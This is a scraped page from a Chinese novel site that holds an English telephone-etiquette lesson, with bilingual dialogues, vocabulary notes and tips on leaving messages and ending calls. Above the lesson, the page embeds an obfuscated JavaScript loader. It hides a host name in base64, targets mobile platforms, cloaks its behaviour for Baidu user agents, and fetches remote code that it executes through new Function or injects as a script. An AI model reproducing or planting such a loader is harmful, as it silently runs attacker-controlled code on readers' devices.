妙书阁小说

阅读记录  |   用户书架
上一页
目录 | 设置
下一章
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

02 电话礼仪(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

a: i&#039;m sorry. we can&#039;t give out her cell phone number.

a:对不起,我们不能把私人电话给您。

steven: then can you call her and give her my number? my number is 6854778. my name is steven kant.

史蒂文:那么你可以给她打电话把我的电话号码给她吗?我的电话是6854778,我叫史蒂文·康德。

a: no problem, mr. kant.

a:没问题,康德先生。

steven: thank you.

史蒂文:谢谢。

notes

1. at present 目前,现在

2. give out 公布;分发

小贴士

out of pocket

out of pocket最常见的意思是“赔钱、白白损失”(having suffered a financial loss)。如果用连字符将out of pocket这三个单词连起来,就成了一个形容词out-ofpocket,最基本的意思是“没钱了”(having no money)。out-of-pocket expenses 则是指一些需要事先用现金支付的,事后可以报销的开销,比如出差时的交通费、食宿费等等。但近来out of pocket成了网上的一个通俗用语,越来越多的网民用somebody is out of pocket来表达“某人现在不在这儿”。那么“赔钱”和“缺席”有什么关系呢?如果你不在办公室(out of office),没有及时被分配任务,那你就失去了赚钱的机会(out of pocket)。如果你不在办公室而在外出差,那么你就经常会有一些out-of-pocket expenses。

例如:

i&#039;m out of pocket these days.

这段时间我不在。

要留言吗

dialogue

maggie is making a phone call to mr. gates,but mr. gates is not in. she asks for leaving a message.

麦琪正在给盖茨先生打电话,但是盖茨先生不在。她想给他留言。

maggie: hello, this is maggie. may i speak to mr. gates, please?

麦琪:你好,我是麦琪。我想找盖茨先生。

a: i&#039;m afraid he is not here now. he went out to call on a customer just now.

a:他现在不在,刚出去见客户了。

maggie: then what time will he be back?

麦琪:那他什么时候回来?

a: i expect him back this afternoon. would you like to leave a message?

a:可能要到下午了。你想要留言吗?

maggie: thank you. i&#039;d like to. would you tell him to call me at 6588758 as soon as he&#039;s back?

麦琪:谢谢你,我要留言。他一回来就让他给6588758回电话好吗?

a: ok. i&#039;ll make sure that he gets the message.

a:好的。我保证他会收到留言的。

maggie: thank you. bye-bye.

麦琪:非常感谢。再见。

a: you&#039;re welcome, bye!

a:不客气,再见。

notes

1. call on 访问,拜访;号召,要求

2. leave a message 留言

小贴士

1. could you just tell her susan called?

能否转告她苏珊找她?

也可以这样说:

just tell her there was a call from susan.

2 please ask her to call me back..

请让她给我回电话。

也可以这样说:

would you tell her to give me a ring when she&#039;s back?

3. please tell him to come to the company quickly.

请告诉他速来公司。

4. no, thank you. it&#039;s nothing urgent.

谢谢,不用,没有什么要紧事。

5. i must discuss the work with him.

我一定要和他讨论这项工作。

6. would you like to leave a message?

你想留言吗?

也可以这样说:

do you have a message?

7. would you like to leave your name and number?

你愿意留下姓名和电话号码吗?

8. may i have your name, please?

请问您贵姓?

也可以这样说:

may i have your name, just in case?

9. i&#039;ll give her the message.

我会转告她的。

也可以这样说:

i&#039;ll make sure she receives the message.

结束电话要礼貌

dialogue

there is a phone call from a customer. sarah is answering the telephone.

有一个顾客打来的电话。莎拉正在接电话。

sarah: hello, this is abc company. what can i do for you?

莎拉:你好,abc公司。我能为您做些什么?

a: hello, i find your company in alibaba, and i want to buy a batch of plane models. which types do you have? what&#039;s the price of the model x768?

a:你好,我在阿里巴巴上看到你们的公司,我想买一批飞机模型。你们都有哪些型号?型号是x768的价格是多少呢?

sarah: we have plane models of more than 20 types. and the price is 50 dollars of that model. i&#039;d like to send some details of all the models to you. may i have your email?

莎拉:我们有20多种型号的飞机模型。您提到的那种是50美元。我想发一些关于所有型号的详细资料给你,您能告诉我您的邮箱地址吗?

a: there is no need of that at present. i just want to know the price of that model.

a:现在还不需要。我只是想了解一下那种型号的价格。

sarah: oh, never mind. anyway thanks for your call. goodbye.

莎拉:哦,没关系。不管怎样,感谢您的来电。再见。

a: bye-bye.

a:再见。

notes

1. a batch of (人或物的)一批

2. plane model 飞机模型

3. detail [&#039;di&#039;teil] n. 详细;详情

小贴士

1. nice talking to you.

很高兴跟你通话。

2. i&#039;ll be looking forward to hearing from you.

我期盼你的回音。

3. thank you for returning my call.

谢谢你给我回电话。

也可以这样说:

thank you for calling me back.

4. i&#039;d better get off the phone.

我得挂电话了。

5. i won&#039;t keep you any longer.

我不耽误你时间了。

6. i&#039;m quite busy at the moment. could you ring back later?

能晚点打来吗?我现在有点忙。

7. say hello to your folks.

请代我向您家人问好。

8. well, i&#039;ll call you again later.

嗯,我晚些时候再打给你。

9. is there anything else i can do for you?

还有什么我可以帮忙的吗?

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间